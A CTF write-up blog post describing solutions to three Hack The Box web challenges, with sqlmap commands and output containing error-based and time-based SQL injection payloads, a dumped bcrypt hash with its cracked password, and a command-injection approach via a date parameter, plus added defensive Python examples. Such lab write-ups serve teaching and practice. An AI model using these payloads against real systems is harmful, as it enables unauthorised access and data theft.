Hello hackers, hope you guys are doing well. I had a chance to participate in HTB's latest CTF and learned a lot, especially from the web challenges. Let me share how I managed to solve a few of the web challenges; the other categories I solved can be found in the other blog post, linked here: writeup

This was a 3-4 day, fairly heavy CTF. Let's check how I managed to solve a few of the web challenges.

WEB CHALLENGES

Flag Command

Description

Solution

First, start an instance and copy the IP and port number into your browser. As usual, the first thing we need is to understand how the site works.

I went straight to Burp Suite to see how I could exploit this. After spending a while trying to exploit it in the browser, I realized that approach was an insane one and decided to keep it simple with Burp Suite.

N/B: from the HTTP history in Burp we can see an API request that looks interesting; let's forward it to the Repeater right away.

There I saw the strange word "secret", so I decided to capture a request while typing the command "HEAD NORTH".

Let's modify it with the secret command we saw earlier; it will look like this.

And there we got the flag.

HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}

KORP Terminal

Description

Solution

As usual we are given a Docker instance here; spawn it and see what we have on the IP and port number.

Got a login page. The first thing I thought of was to bypass the login page with SQL injection via the username and password fields. Mhmmmmmmmm

While testing the login page with SQL injection I observed unusual behavior in the username field: some payloads showed me that the username is 'admin', so the only thing missing is the password (how do we get that???).

The other error was this one, which showed me that the login page is vulnerable to SQL injection.

N/B: after spending a lot of time trying to bypass this, I realized that SQL injection can also be used for other things, like extracting the database, instead of spending even more time trying to bypass the login.

I decided to automate this with sqlmap, so I saved the request into a file and started testing from my terminal.

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF]
└─$ sqlmap -r b.req --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:07 /2024-03-12/

[01:16:07] [INFO] parsing HTTP request from 'b.req'
[01:16:07] [INFO] testing connection to the target URL
[01:16:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401). If this is intended, try to rerun by providing a valid value for option '--ignore-code'
[01:16:09] [WARNING] HTTP error codes detected during run:
401 (Unauthorized) - 1 times

[*] ending @ 01:16:09 /2024-03-12/

Let's read the error carefully. It says the credentials are invalid (that is true), and at the end it says we can ignore this with the "--ignore-code" option.

I decided to add this option at the end of my first command.

Now it started working LOL. I waited for sqlmap to finish the task.

Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: username=admin' AND EXTRACTVALUE(9701,CONCAT(0x5c,0x7170787071,(SELECT (ELT(9701=9701,1))),0x717a716a71)) AND 'XIUM'='XIUM&password=admin

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 2204 FROM (SELECT(SLEEP(5)))IEup) AND 'gIjy'='gIjy&password=admin
---
[01:21:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[01:21:22] [INFO] fetching database names
[01:21:23] [INFO] retrieved: 'information_schema'
[01:21:23] [INFO] retrieved: 'korp_terminal'
[01:21:23] [INFO] retrieved: 'test'
available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test
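What the boolean- and error-based payloads above rely on can be shown in a few lines of Python. This is an added example, not the challenge's code: it uses an in-memory SQLite table instead of the challenge's MariaDB (SQLite has no EXTRACTVALUE, so the error is provoked differently), a constructed admin row with a placeholder hash, and contrasts a string-concatenated lookup with a parameterised one.

```python
import sqlite3


def make_db():
    """Constructed sample database: one admin user, as in korp_terminal.
    The hash is a placeholder, not the value from the writeup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', '$2b$12$<placeholder-hash>')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """String concatenation: whatever the user typed is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn, username):
    """Parameterised query: the input is bound as a value and never parsed as SQL."""
    row = conn.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def probe(conn, username):
    """Return (vulnerable_result, safe_result) for one username.

    A database error raised on the vulnerable path is returned as text, because
    error-based injection works precisely when that text reaches the client.
    The fix is therefore two-fold: bind parameters, and never echo DB errors."""
    try:
        vulnerable = lookup_vulnerable(conn, username)
    except sqlite3.Error as exc:
        vulnerable = f"ERROR: {exc}"
    return vulnerable, lookup_safe(conn, username)


if __name__ == "__main__":
    db = make_db()
    # The tail of sqlmap's payload (AND 'XIUM'='XIUM) is a true condition: the
    # vulnerable query still returns admin, the safe one finds no such user.
    for name in ("admin", "admin' AND 'XIUM'='XIUM", "admin' AND 'XIUM'='XIUN"):
        print(repr(name), "->", probe(db, name))
```

The true/false pair ('XIUM'='XIUM' versus 'XIUM'='XIUN') is the same signal sqlmap used to confirm the injection: the vulnerable path answers differently for the two, the parameterised path answers None for both.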

I decided to dump the korp_terminal database.

And we can see a Blowfish-based (bcrypt, $2b$) password hash:

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.

Let's crack it with hashcat. I cracked it while I was solving the challenge.
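A small parser for the hash format above, added here as an illustration and not part of the original writeup: it splits the modular-crypt string into version, cost, salt and digest, so you can see that the salt is stored in the clear and that cost 12 means 2^12 key-expansion rounds per guess. That slows hashcat down per candidate, but it does not rescue a password that sits near the top of every wordlist.

```python
import re

# bcrypt modular-crypt layout: $<version>$<cost>$<22-char salt><31-char digest>
# using bcrypt's own base64 alphabet (./A-Za-z0-9). Cost is a 2-digit exponent.
_BCRYPT_RE = re.compile(r"\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})")


def parse_bcrypt(hash_string):
    """Split a bcrypt hash into its fields; raise ValueError on malformed input."""
    match = _BCRYPT_RE.fullmatch(hash_string)
    if not match:
        raise ValueError("not a bcrypt hash in modular-crypt format")
    version, cost, salt, digest = match.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:          # bcrypt's defined cost range
        raise ValueError("bcrypt cost must be between 4 and 31")
    return {
        "version": version,
        "cost": cost,
        "rounds": 2 ** cost,          # key-expansion iterations per password guess
        "salt": salt,                 # 128-bit salt, stored in the clear
        "digest": digest,             # 184-bit truncated Blowfish output
    }


if __name__ == "__main__":
    # Hash as dumped from the korp_terminal database in the writeup.
    print(parse_bcrypt("$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv."))
```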

Now that we have the credentials we can try to log in:

username: admin
password: password123

FLAG:HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}

TimeKORP

Description

Solution

Download the files and at the same time start a Docker instance so we can interact with the challenge.

It's a time machine. It took me a while to understand how to exploit it; I decided to go and read the source code again and found this code:

I reviewed the source and realized that the date command lets us execute commands, so we can try to break the restriction and run our own commands via command injection.
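The shape of that bug, as an added Python example rather than the challenge's own PHP (the Dockerfile below shows the app runs under php-fpm): the vulnerable function splices a user-supplied date format into a shell command line, while the hardened one allow-lists the format and calls date with an argv list so no shell ever parses the input. The allow-list, function names and the demo strings are my own choices.

```python
import re
import subprocess

# Allow-list for a "time machine" format parameter: a handful of strftime
# specifiers and separators, nothing that a shell could interpret.
_FORMAT_RE = re.compile(r"(%[YmdHMS]|[ :/-])+")


def build_shell_command(fmt):
    """Vulnerable pattern: the user's format becomes part of a shell command string.
    Quotes inside fmt close the single-quoted argument and everything after is shell."""
    return f"date '+{fmt}'"


def run_date_vulnerable(fmt):
    return subprocess.run(build_shell_command(fmt), shell=True,
                          capture_output=True, text=True).stdout


def is_safe_format(fmt):
    """True only if fmt consists solely of allow-listed specifiers and separators."""
    return _FORMAT_RE.fullmatch(fmt) is not None


def run_date_safe(fmt):
    """Hardened pattern: validate first, then pass the format as one argv element.
    With shell=False the string is never parsed by /bin/sh, so quotes and
    semicolons have no special meaning even if validation were loosened later."""
    if not is_safe_format(fmt):
        raise ValueError("rejected date format")
    return subprocess.run(["date", f"+{fmt}"], capture_output=True,
                          text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed inputs: a legitimate format and one that smuggles a second command.
    for fmt in ("%H:%M", "%H:%M'; echo injected; echo '"):
        verdict = "allowed" if is_safe_format(fmt) else "rejected"
        print(f"{fmt!r}: shell line {build_shell_command(fmt)!r} -> {verdict}")
```

Note that escaping alone (wrapping the value in quotes, as the vulnerable line does) is not a fix: the allow-list plus the argv form is what removes the shell from the picture.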

Now let's find the flag, as we have successfully exploited the vulnerability.

N/B: finding the flag was another challenge in itself; I spent 20-30 minutes looking for it, so I decided to check the Dockerfile and see if I could find it there, because in the Docker image you can see what is set up and what has been restricted. Let's see:

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/dd/web_timekorp]
└─$ cat Dockerfile                    
FROM debian:buster-slim

# Setup user
RUN useradd www

# Install system packeges
RUN apt-get update && apt-get install -y supervisor nginx lsb-release wget

# Add repos
RUN wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg
RUN echo "deb https://packages.sury.org/php/ $(lsb_release -sc) main" | tee /etc/apt/sources.list.d/php.list

# Install PHP dependencies
RUN apt update && apt install -y php7.4-fpm

# Configure php-fpm and nginx
COPY config/fpm.conf /etc/php/7.4/fpm/php-fpm.conf
COPY config/supervisord.conf /etc/supervisord.conf
COPY config/nginx.conf /etc/nginx/nginx.conf

# Copy challenge files
COPY challenge /www

# Setup permissions
RUN chown -R www:www /www /var/lib/nginx

# Copy flag
COPY flag /flag

# Expose the port nginx is listening on
EXPOSE 80

# Populate database and start supervisord
CMD /usr/bin/supervisord -c /etc/supervisord.conf 

At the bottom we can see that the flag was copied to the root directory, so we can read the flag from the root directory like this:

[Screenshots, 2024-03-12: the injected request and the response returning /flag]

HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}